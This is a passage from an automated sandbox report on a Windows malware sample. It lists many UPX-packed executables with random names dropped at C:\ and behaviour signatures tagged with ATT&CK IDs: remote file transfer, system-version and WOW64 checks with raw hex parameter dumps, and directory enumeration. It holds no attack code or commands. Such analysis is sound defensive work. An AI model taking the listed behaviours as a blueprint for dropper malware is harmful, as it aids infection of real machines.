N/A]\n \"28042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"028260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tfdbnrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjrvvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"blnxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blnxt.exe]- [targetUID: 00000000-00003896]\n \"tnvhlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tnvhlh.exe]- [targetUID: 00000000-00004480]\n \"ljhdxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ljhdxt.exe]- [targetUID: 00000000-00004480]\n \"82426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82426.exe]- [targetUID: 00000000-00004236]\n \"28646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28646.exe]- [targetUID: 00000000-00004164]\n \"228864.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\228864.exe]- [targetUID: 00000000-00003812]\n \"8402266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8402266.exe]- [targetUID: 00000000-00003812]\n \"088422.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\088422.exe]- [targetUID: 00000000-00004040]\n \"464224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464224.exe]- [targetUID: 00000000-00004040]\n \"406266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\406266.exe]- [targetUID: 00000000-00000888]\n \"flxrvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\flxrvf.exe]- [targetUID: 00000000-00000888]\n \"fnxtfnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnxtfnf.exe]- [targetUID: 00000000-00000984]\n \"dvrdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvrdv.exe]- [targetUID: 00000000-00000984]\n \"pxnlrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxnlrd.exe]- [targetUID: 00000000-00003912]\n \"dpbtn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpbtn.exe]- [targetUID: 00000000-00003912]\n \"lxrvjtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxrvjtr.exe]- [targetUID: 00000000-00000700]\n \"2028620.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2028620.exe]- [targetUID: 00000000-00003372]\n \"084242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\084242.exe]- [targetUID: 00000000-00003760]\n \"22866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22866.exe]- [targetUID: 00000000-00003760]\n \"042028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\042028.exe]- [targetUID: 00000000-00002384]\n \"60808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60808.exe]- [targetUID: 00000000-00001632]\n \"8482804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8482804.exe]- [targetUID: 00000000-00001632]\n \"8844842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8844842.exe]- [targetUID: 00000000-00004260]\n \"8082460.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8082460.exe]- [targetUID: 00000000-00004260]\n \"80428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80428.exe]- [targetUID: 00000000-00004344]\n \"840882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\840882.exe]- [targetUID: 00000000-00002072]\n \"fpdjbdp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fpdjbdp.exe]- [targetUID: 00000000-00002072]\n \"fnpdnrn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnpdnrn.exe]- [targetUID: 00000000-00002204]\n \"tlxfnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlxfnh.exe]- [targetUID: 00000000-00002204]\n \"pthvxnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pthvxnr.exe]- [targetUID: 00000000-00003512]\n \"dtvthvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtvthvj.exe]- [targetUID: 00000000-00003512]\n \"24006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24006.exe]- [targetUID: 00000000-00003440]\n \"60448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60448.exe]- [targetUID: 00000000-00004148]\n \"44244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44244.exe]- [targetUID: 00000000-00004148]\n \"2628842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2628842.exe]- [targetUID: 00000000-00000780]\n \"hbdtpx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbdtpx.exe]- [targetUID: 00000000-00003780]\n \"hrrxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrrxd.exe]- [targetUID: 00000000-00003996]\n \"vfpfhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfpfhn.exe]- [targetUID: 00000000-00003996]\n \"hhrpl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hhrpl.exe]- [targetUID: 00000000-00003784]\n \"nblht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nblht.exe]- [targetUID: 00000000-00003208]\n \"xbbfdpr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbbfdpr.exe]- [targetUID: 00000000-00003208]\n \"8460680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8460680.exe]- [targetUID: 00000000-00003776]\n \"442602.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\442602.exe]- [targetUID: 00000000-00003776]\n \"2886400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2886400.exe]- [targetUID: 00000000-00000832]\n \"fhftdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhftdj.exe]- [targetUID: 00000000-00005868]\n \"rfhxbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rfhxbp.exe]- [targetUID: 00000000-00004372]\n \"rbtft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbtft.exe]- [targetUID: 00000000-00005252]\n \"6028624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6028624.exe]- [targetUID: 00000000-00005252]\n \"42068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42068.exe]- [targetUID: 00000000-00003580]\n \"4042240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4042240.exe]- [targetUID: 00000000-00004352]\n \"28886.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28886.exe]- [targetUID: 00000000-00004284]\n \"00226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00226.exe]- [targetUID: 00000000-00004284]\n \"ldlfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldlfr.exe]- [targetUID: 00000000-00004128]\n \"drrxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drrxb.exe]- [targetUID: 00000000-00006020]\n \"482606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482606.exe]- [targetUID: 00000000-00006020]\n \"8442880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8442880.exe]- [targetUID: 00000000-00005968]\n \"4400860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4400860.exe]- [targetUID: 00000000-00006132]\n \"800866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\800866.exe]- [targetUID: 00000000-00006132]\n \"8080888.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8080888.exe]- [targetUID: 00000000-00006000]\n \"nxpbdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxpbdf.exe]- [targetUID: 00000000-00006000]\n \"xdpjtxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdpjtxl.exe]- [targetUID: 00000000-00005840]\n \"vplpt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vplpt.exe]- [targetUID: 00000000-00005840]\n \"lbxbhh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbxbhh.exe]- [targetUID: 00000000-00005896]\n \"ptnfvbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptnfvbx.exe]- [targetUID: 00000000-00005816]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006900205f69001b5f690000000000000000000000610000000001ecdf12000000000050ed120095e168770c3b1700feffffff435c6c7750596c77aa000000b80000001a5f6900185f690074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c6b7760d87475ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed6c77425f6900a06a42758600000074e11200ace512000000000086008800a06a427574e11200916c4275425f6900a06a4275a06a4275e4e5120002020000 (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005816)\n \"ptnfvbx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100401e21003b1e2100000000000000000000001900000000011ce312000000000080f0120095e16877e3391700feffffff435c6c7750596c77aa000000b80000003a1e2100381e2100a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000019001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c77621e2100a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c4275621e2100a06a4275a06a427514e9120002020000 (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)\n \"lbxbhh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002300f0202300eb202300000000000000000000001b00000000011ce312000000000080f0120095e16877ff3e1700feffffff435c6c7750596c77aa000000b8000000ea202300e8202300a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c7712212300a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c427512212300a06a4275a06a427514e9120002020000 (UID: 00000000-00005792)\n \"lbxbhh.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005792)\n \"vplpt.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005840)\n \"vplpt.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e0088202e0083202e00000000000000000000002600000000011ce312000000000080f0120095e16877f83d1700feffffff435c6c7750596c77aa000000b800000082202e0080202e00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000026001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c77aa202e00a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c4275aa202e00a06a4275a06a427514e9120002020000 (UID: 00000000-00005840)\n \"vplpt.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005840)\n \"xdpjtxl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006048)\n \"xdpjtxl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00f81f2f00f31f2f00000000000000000000002700000000011ce312000000000080f0120095e1687749231700feffffff435c6c7750596c77aa000000b8000000f21f2f00f01f2f00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c771a202f00a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c42751a202f00a06a4275a06a427514e9120002020000 (UID: 00000000-00006048)\n \"xdpjtxl.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006048)\n \"nxpbdf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006000)\n \"nxpbdf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0088b31e0083b31e00000000000000000000001700000000011ce312000000000080f0120095e168772a211700feffffff435c6c7750596c77aa000000b800000082b31e0080b31e00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000017001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c77aab31e00a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c4275aab31e00a06a4275a06a427514e9120002020000 (UID: 00000000-00006000)\n \"nxpbdf.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006000)\n \"8080888.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003600d0233600cb233600000000000000000000002e00000000011ce312000000000080f0120095e16877ac241700feffffff435c6c7750596c77aa000000b8000000ca233600c8233600a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c77f2233600a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c4275f2233600a06a4275a06a427514e9120002020000 (UID: 00000000-00005784)\n \"8080888.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005784)\n \"800866.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006132)\n \"800866.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002200b0a92200aba92200000000000000000000001b00000000011ce312000000000080f0120095e16877962b1700feffffff435c6c7750596c77aa000000b8000000aaa92200a8a92200a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001b001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c77d2a92200a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c4275d2a92200a06a4275a06a427514e9120002020000 (UID: 00000000-00006132)\n \"800866.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006132)\n \"4400860.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003100d0213100cb213100000000000000000000002900000000011ce312000000000080f0120095e16877792f1700feffffff435c6c7750596c77aa000000b8000000ca213100c8213100a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c77f2213100a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c4275f2213100a06a4275a06a427514e9120002020000 (UID: 00000000-00005968)\n \"4400860.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"8442880.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000030003822300033223000000000000000000000002800000000011ce312000000000080f0120095e16877732e1700feffffff435c6c7750596c77aa000000b80000003222300030223000a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c6b7760d87475ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6c775a223000a06a427586000000a4e41200dce812000000000086008800a06a4275a4e41200916c42755a223000a06a4275a06a427514e9120002020000 (UID: 00000000-00004104)\n \"8442880.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004104)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"ptnfvbx.exe\" called \"IsWow64Process\" with parameter \"5896\" - (UID: 00000000-00005896)\n \"vplpt.exe\" called \"IsWow64Process\" with parameter \"5840\" - (UID: 00000000-00005840)\n \"xdpjtxl.exe\" called \"IsWow64Process\" with parameter \"6048\" - (UID: 00000000-00006048)\n \"nxpbdf.exe\" called \"IsWow64Process\" with parameter \"6000\" - (UID: 00000000-00006000)\n \"800866.exe\" called \"IsWow64Process\" with parameter \"6132\" - (UID: 00000000-00006132)\n \"482606.exe\" called \"IsWow64Process\" with parameter \"6020\" - (UID: 00000000-00006020)\n \"drrxb.exe\" called \"IsWow64Process\" with parameter \"4128\" - (UID: 00000000-00004128)\n \"ldlfr.exe\" called \"IsWow64Process\" with parameter \"6008\" - (UID: 00000000-00006008)\n \"rfhxbp.exe\" called \"IsWow64Process\" with parameter \"5868\" - (UID: 00000000-00005868)\n \"fhftdj.exe\" called \"IsWow64Process\" with parameter \"832\" - (UID: 00000000-00000832)\n \"442602.exe\" called \"IsWow64Process\" with parameter \"3776\" - (UID: 00000000-00003776)\n \"8460680.exe\" called \"IsWow64Process\" with parameter \"2496\" - (UID: 00000000-00002496)\n \"nblht.exe\" called \"IsWow64Process\" with parameter \"3784\" - (UID: 00000000-00003784)\n \"vfpfhn.exe\" called \"IsWow64Process\" with parameter \"3996\" - (UID: 00000000-00003996)\n \"hbdtpx.exe\" called \"IsWow64Process\" with parameter \"780\" - (UID: 00000000-00000780)\n \"44244.exe\" called \"IsWow64Process\" with parameter \"4148\" - (UID: 00000000-00004148)\n \"60448.exe\" called \"IsWow64Process\" with parameter \"3384\" - (UID: 00000000-00003384)\n \"dtvthvj.exe\" called \"IsWow64Process\" with parameter \"3512\" - (UID: 00000000-00003512)\n \"tlxfnh.exe\" called \"IsWow64Process\" with parameter \"2204\" - (UID: 00000000-00002204)\n \"fnpdnrn.exe\" called \"IsWow64Process\" with parameter \"4036\" - (UID: 00000000-00004036)\n \"840882.exe\" called \"IsWow64Process\" with parameter \"4344\" - (UID: 00000000-00004344)\n \"8082460.exe\" called \"IsWow64Process\" with parameter \"4260\" - (UID: 00000000-00004260)\n \"042028.exe\" called \"IsWow64Process\" with parameter \"4472\" - (UID: 00000000-00004472)\n \"084242.exe\" called \"IsWow64Process\" with parameter \"3372\" - (UID: 00000000-00003372)\n \"lxrvjtr.exe\" called \"IsWow64Process\" with parameter \"700\" - (UID: 00000000-00000700)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter 72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005816)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"FindNextFileW\" with parameter Documents and Settings 